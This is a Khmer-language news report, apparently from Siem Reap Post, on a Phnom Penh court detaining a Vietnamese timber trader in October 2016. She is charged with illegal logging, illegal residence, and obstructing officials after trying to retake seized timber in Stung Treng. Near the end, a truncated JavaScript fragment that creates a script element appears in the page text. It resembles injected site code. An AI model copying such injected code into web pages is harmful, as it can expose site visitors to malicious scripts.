Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

យាយព្រឿងឈ្មួញឈើ ដ៍ល្បីល្បាញ ត្រូវបានតុលាការ សម្រេចឃុំខ្លួន ក្រោមបទចោទចំនួន៣

 ភ្នំពេញ ៖ សាលាដំបូងរាជ ធានីភ្នំពេញ នៅល្ងាចថ្ងៃទី១៦ ខែតុលា ឆ្នាំ២០១៦ បានសម្រេចឃុំ ខ្លួនឈ្មួញរកស៊ី ឈើដ៏ធំប្រចាំភូមិភាគឦសាន្ត និងមានទីតាំងស្តុកឈើ ជាច្រើនកន្លែង នៅក្នុងខេត្តស្ទឹងត្រែង ដាក់ពន្ធនាគារ ជាបណ្ដោះអាសន្ន ក្រោមបទចោទចំនួន៣បទល្មើស។

ជនជាប់ចោទមានឈ្មោះ ហេង សំនៀង ហៅយាយព្រឿង ភេទស្រី អាយុ៥៧ឆ្នាំ ជាជនជាតិវៀតណាម ត្រូវបានអយ្យការអមសាលាដំបូងរាជធានីភ្នំពេញ ចោទប្រកាន់ពីបទ ៖ ទី១.ប្រមូលផលអនុផលព្រៃឈើ ដោយគ្មានលិខិតអនុញ្ញាតិ (បទប្បញ្ញត្តិមានចែងតាមមាត្រា៩៨ ច្បាប់ស្តីអំពីព្រៃឈើ) ។ ទី២. ការហាមឃាត់ចំពោះការចូល និងស្នាក់នៅក្នុងដែនដីនៃព្រះរាជាណាចក្រកម្ពុជា ដល់ទណ្ឌិតដែលជាជនបរទេស និងទី៣. ប្រឆាំងនិងអ្នករាជការសាធារ:ដោយមានស្ថានទំងន់ទោស (បទប្បញ្ញត្តិមានចែងតាមមាត្រា៦១, ៥០៤នៃក្រមព្រហ្មទណ្ឌកម្ពុជា) ប្រព្រឹត្តនៅភូមិអូរឫស្សីកណ្តាល ឃុំអូរឫស្សីកណ្តាល ស្រុកសៀមបូក ខេត្តស្ទឹងត្រែង កាលពីថ្ងៃទី១២-១៣ ខែតុលា ឆ្នាំ២០១៦ កន្លងទៅ។

គួររំលឹកជូនថា កាលពីថ្ងៃទី១២ ខែតុលា ឆ្នាំ២០១៦ កម្លាំងសមត្ថកិច្ច បានសហការ ជាមួយស្ថាប័ន តុលាការ ខេត្តស្ទឹងត្រែង បានចុះស្រាវជ្រាវ រកឃើញគំនរ ឈើប្រណីត ចំនួន៦រថយន្តសាំយ៉ុង និង៦រថយន្តបែន ដែលគេលួចលាក់ ទុកនៅក្នុងចម្ការមួយកន្លែង ឋិតនៅភូមិស្រែក្រសាំង ឃុំស្រែក្រសាំង ស្រុកសៀមបូក ខេត្តស្ទឹងត្រែង ហើយឈើដ៏ច្រើន នោះត្រូវបានសមត្ថកិច្ចប្រមូល ដឹកយកមករក្សាទុក ជាវត្ថុតាងបទល្មើស នៅសង្កាត់រដ្ឋបាលព្រៃ ឈើអូរពងមាន់ ខេត្តស្ទឹងត្រែង ។
ស្រាប់តែនៅវេលា ព្រឹកព្រលឹមថ្ងៃទី១៣ ខែតុលា ឆ្នាំ២០១៦ម្សិលមិញ បែរជាលេច ចេញវត្តមានឈ្មួញឈើឈ្មោះ;យាយព្រឿង រួមជាមួយកម្លាំងកម្មករ៧នាក់ និងរថយន្ត២គ្រឿង ធ្វើសកម្មភាពរំដោះ យកឈើជាវត្ថុតាង និងឡោមព័ទ្ធកងកម្លាំងយាមកាមឈើទៀតផង ទើបត្រូវកម្លាំងសមត្ថកិច្ច ចាប់ឃាត់ខ្លួន ឈ្មួញឈើដុះស្លែ និងថ្លើមធំនេះក្នុង បទល្មីសជាក់ស្តែងតែម្តង ៕ ដោយ សៀមរាបប៉ុស្ដិ៍

var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More